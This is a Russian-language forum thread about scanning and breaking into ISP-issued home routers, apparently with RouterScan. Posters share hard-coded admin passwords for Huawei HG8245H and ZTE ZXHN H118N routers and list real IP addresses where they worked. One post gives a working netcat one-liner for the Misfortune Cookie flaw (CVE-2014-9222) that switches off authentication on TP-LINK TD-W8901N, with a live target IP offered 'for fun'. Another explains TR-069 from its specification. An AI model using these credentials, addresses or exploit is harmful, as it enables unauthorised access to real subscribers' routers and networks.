Надо пробовать по внутренним адресам, как локалку 10.х.х.х или 100.х.х.х Снаружи эта сеть почти полностью закрыта.
Кто-нибудь сталкивался с роутерами WiFire? Вроде как в сети netbynet находятся. Какие там обычно по дефолту пароли/пины?
как нибудь можно настроить, чтоб она сканила определенную марку роутера, чтоб скан шел быстрей,а другие отсеивались моментально? вот еще на HG8245H telecomadmin\YAqyUK7JRjaWdOwZ8xhVkf9L45PtmMcsQXnEvSuCgpTir3IHe6
Можно использовать Charles, но при этом придётся вручную походить по страницам веб интерфейса роутера. Из автоматизированных знаю лишь Teleport Pro.
binarymaster Вопрос к разработчику...функция Use credentials 1. Не нашел абсолютно нигде но точно знаю, что в этой функции возможно использовать подстановочные символы для опции "Password". Пример - "%i%i%i%i" - будет подставлять значения из IP'шника проверяемого. Какие еще подстановочные символы возможны для этой опции? 2. Нельзя ли добавить для этой функции проверку роутеров D-Link-300NRU rev.B5/B6(v.2.5.4; v.2.5.11; v.2.5.12; v.2.5.19) и аналогичных D-Link'ов.
Это недокументированная фича Не совсем понял, эта функция (Use credentials) не привязана к конкретным моделям роутеров.
Кто-бы понял...- но на роутерах D-Link-300 NRU rev.B5/B6 и аналогичным по интерфейсу функция (Use credentials) отрабатывает как и должна, а на D-Link-300 и и ему подобным - без "NRU" не подбирает. Ну и спасибо, конечно...
и всё же, как бы изломать домрушные ZTE ZXHN H118N, у которых снаружи открыт только порт tr069? ко всем подходит пароль cracs:Snyk9Tl24v75fHr9Jn9V а вот дальше то чего с ними сделать? 5.166.69.39 1050 31 Done dirname 5.166.69.45 1050 32 Done dirname 5.166.69.49 1050 31 Done dirname
То есть TR-069 основан на HTTP? Не знал. Или так только с этими роутерами? Там должны быть свои API вызовы, в том числе позволяющие открыть порт или включить удалённое администрирование.
для меня TR-069 совсем темный лес. но ведь зачем-то там mini_httpd/1.19 19 стоит. как я для себя понял систему работы - у провайдера стоит сервис, который ходит авторизовавшись по прямым ссылкам и смотрит/правит настройки. или нет? этих ZTE у дом.ру кучи, такая же фигня в МТС. а получается, толку нет
TR-069 действительно основан на HTTP. Проверял на Sagemcom FaST известного(старейшего) из провайдеров. Он с..а закрыл все внешние порты кроме 7547(TR-069). Ради интереса можете просканировать RS любой из IP ...телекома на 80 и 7547 и почувствуйте разницу. По моим скромным оценкам разница в пол сотни раз. А вот как можно это использовать ... Лично у меня ничего не получилось, хотя таки да протокол создан для управления всеми настроенными роутерами с одного сервера. Всем Удачи.
Можете почитать вот этот документ: https://www.broadband-forum.org/technical/download/TR-069_Amendment-5.pdf Если я правильно понял, инициатором соединения может быть как CPE (Customer Premise Equipment, в нашем случае это роутер), так и ACS (Auto-Configuration Server). Первый должен делать это, например, при включении/перезагрузке, через определённый интервал (ManagementServer.PeriodicInformInterval), при изменении ACS URL, ..., либо при получении валидного запроса от ACS. ACS для установления соединения должен использовать пустой HTTP GET запрос, в качестве метода аутентификации - HTTP digest authentication. При успешной аутентификации CPE отвечает “200 (OK)” или “204 (No Content)”, после чего он должен в течение 30 секунд попытаться открыть сессию с предопределенным адресом ACS. Подчёркиваю, CPE устанавливает сессию не с тем адресом, с которого пришёл запрос, а с тем, который: 1) задан по умолчанию; 2) был сконфигурирован локально; 3) получен от DHCP сервера (который может включать ACS URL как опцию). Вывод: использовать tr069 со стороны, даже зная пароль, не получиться (если не брать в расчёт возможное наличие уязвимостей). P.S. TR-069 использует следующий стек протоколов: CPE/ACS Management Application RPC Methods SOAP HTTP SSL/TLS TCP/IP P.P.S А домрушных ZTE ZXHN H118N (если речь о подключении к wifi) есть словарик.
#exploit Уязвимость Misfortune Cookie применительно к TP-LINK TD-W8901N Изучая информацию по TR-069, опять наткнулся на упоминания уязвимости CVE-2014-9222 Misfortune Cookie во встраиваемом веб-сервере RomPager, а конкретно, вот на эту презентацию: http://www.rsaconference.com/writab...things-one-exploit-to-rule-them-all_final.pdf. Там есть некоторые технические подробности данной уязвимости и ссылка (http://cawanblog.blogspot.ru/2015/02/misfortune-cookie-cve-2014-9222.html) на пример её реализации для TD-W8901N. Чтобы получить доступ к настройкам данной модели роутера без необходимости ввода пароля, нужно отправить запрос с "Cookie: C107353880=\0", что равносильно выполнению команды "sys pswauthen 0". С curl этого сделать не получиться, но можно отправить пакет, например, с помощью netcat: Code: echo $'GET / HTTP/1.1\nCookie: C107353880=\x00' | nc <IP> <Port> От себя добавлю, что вернуть аутентификацию, можно аналогичным образом: Code: echo $'GET / HTTP/1.1\nCookie: C107353880=\x01' | nc <IP> <Port> Кто хочет поразвлекаться, вот ip, на котором это работает: 46.244.71.I58
у меня по этому словарю 50/50 - 2 из 4х точек сдались. две либо с меняными паролями, либо словарь не полный. надо будет заняться и проверить их еще раз. в локалке другого провайдера около тысячи ZTE H218N, бери - не хочу, только RS инфу из них не выдирает